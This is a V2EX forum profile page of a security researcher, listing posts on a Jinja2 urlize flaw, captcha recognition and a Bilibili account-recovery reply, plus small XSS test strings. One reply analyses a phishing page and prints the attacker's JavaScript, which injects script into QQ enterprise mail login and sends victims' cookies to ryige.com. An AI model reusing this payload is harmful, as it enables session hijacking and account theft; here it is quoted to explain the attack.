Evi1m0 最近的时间轴更新
http://www.google.com/aaa@test#xxx"xx><H1>x1
2014-10-31 11:11:53 +08:00
http://www.google.com/aaa@test#xxx"xxx
2014-10-31 11:10:54 +08:00
http://www.google.com/aaa@test#xxx
2014-10-31 11:10:20 +08:00
Beehive v0.1.0 Release
信息安全  •  Evi1m0  •  2015-07-31 10:01:31 AM  •  最后回复来自 Evi1m0
8
12306 售票网站新版验证码识别对抗
  •  1   
    奇思妙想  •  Evi1m0  •  2015-03-26 15:10:40 PM  •  最后回复来自 xlrtx
    32
    [Sreg] Search Registration V1 版本发布
    分享创造  •  Evi1m0  •  2015-03-15 12:01:43 PM  •  最后回复来自 v2ex_user001
    2
    test#aaa"test.com title test
    沙盒  •  Evi1m0  •  2015-06-10 10:09:59 AM  •  最后回复来自 Evi1m0
    5
    Jinja2 2.0 /utils.py urlize vulnerability
    信息安全  •  Evi1m0  •  2015-12-11 13:49:45 PM  •  最后回复来自 Evi1m0
    4
    分享几个 Beebeeto 邀请码
    信息安全  •  Evi1m0  •  2015-12-11 14:53:12 PM  •  最后回复来自 sololivan
    30
    Evi1m0 最近回复了
    @okletswin 不是依赖一条做找回评判的,楼主提到的也只是第五条,综合评判:

    ①常用登陆地
    ②账号绑定的手机号和邮箱号
    .......
    ⑧所使用过的昵称+相应时间
    ⑨常用游览器&插件(包括第三方插件)
    ⑩邮箱已失效的证明截图(可证明邮箱运营商已停运)
    针对帖子中提出的问题:『用户是否明文存储密码、客服智能姬关于绑定信息失效(手机 /邮箱)无法登陆的情况需要让用户发送历史上使用的明文密码』,我们第一时间进行了跟进和解决,结果如下:

    - 用户密码确定加密存储
    - 由于申诉问题需要多方信息的对比综合评测,在一定情况下人工参与是必要存在的
    - 关于客服智能姬系统中询问用户历史上使用过的密码的方式,确实存在安全隐患,现已修改为:曾经通过何种方式修改过密码加相应时间( PC 端修改 或 移动端修改)

    感谢反馈!
    2018-02-22 11:14:52 +08:00
    回复了 Henryzhao 创建的主题 全球工单系统 请求 Bilibili 开启二步认证
    什么明文密码什么脱裤...怎么不动脑子的那么多?

    题主提到的二步认证现在被小范围用于被风控的账号中,例如存在弱口令或撞库风险的账号。
    2015-12-11 13:49:45 +08:00
    回复了 Evi1m0 创建的主题 信息安全 Jinja2 2.0 /utils.py urlize vulnerability
    <img src="test">
    2015-12-07 17:05:45 +08:00
    回复了 graetdk 创建的主题 分享创造 第三方微博搜索 API 的想法
    2015-11-09 15:56:05 +08:00
    回复了 twoconk 创建的主题 设计 新上线 web 站,求吐槽
    2015-11-02 19:47:04 +08:00
    回复了 saxon 创建的主题 问与答 朋友 6S 被偷了,小偷(可能是团伙)发来链接偷取 APPLE ID
    2015-11-02 15:58:08 +08:00
    回复了 saxon 创建的主题 问与答 朋友 6S 被偷了,小偷(可能是团伙)发来链接偷取 APPLE ID
    嗯,刚才测试了一下,如果你的企业邮箱在登录情况下访问了如上网址,是可以登录你的邮箱。
    2015-11-02 15:17:27 +08:00
    回复了 saxon 创建的主题 问与答 朋友 6S 被偷了,小偷(可能是团伙)发来链接偷取 APPLE ID
    @BOYPT

    两个 iframe ,一些常见网站是人民网的分享接口进行的访问,不是攻击者。

    另外一个 iframe 是进行攻击者的操作:

    <iframe src="http://society.people.com.cn/n/2015/1031/c1008-27760163.html" style="width:100%;height:1200px;border:none"></iframe>

    <iframe src="/htmlpage5.html" style="display:none"></iframe>

    ---------------

    function test(PARAMS) {
    var temp = document.createElement("form");
    temp.acceptCharset = "utf-8";
    //By Wfox
    temp.action = 'http://m.exmail.qq.com/cgi-bin/login';
    temp.method = "post";
    temp.style.display = "none";
    for (var x in PARAMS) {
    var opt = document.createElement("textarea");
    opt.name = x;
    opt.value = PARAMS[x];
    temp.appendChild(opt);
    }
    document.body.appendChild(temp);
    temp.submit();
    }
    test({
    uin: '\\&quot;&lt;/script&gt;&lt;script src=http://ryige.com/q/8&gt;&lt;/script&gt;',
    });


    document.domain="qq.com";
    window.onload=documentrrady;
    function documentrrady(){
    window.location.href="http://ryige.com/server/AddQQUser?c="+encodeURI(document.cookie)+"&u=lockKey8&r="+encodeURI(document.referrer)
    };
    2015-08-03 15:24:55 +08:00
    回复了 xiongbiao 创建的主题 分享创造 用 Python 给 Linux 写了个键盘音效软件 - Tickeys - Linux
    nice
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   我们的愿景   ·   实用小工具   ·   3101 人在线   最高记录 6543   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 18ms · UTC 12:43 · PVG 20:43 · LAX 05:43 · JFK 08:43
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.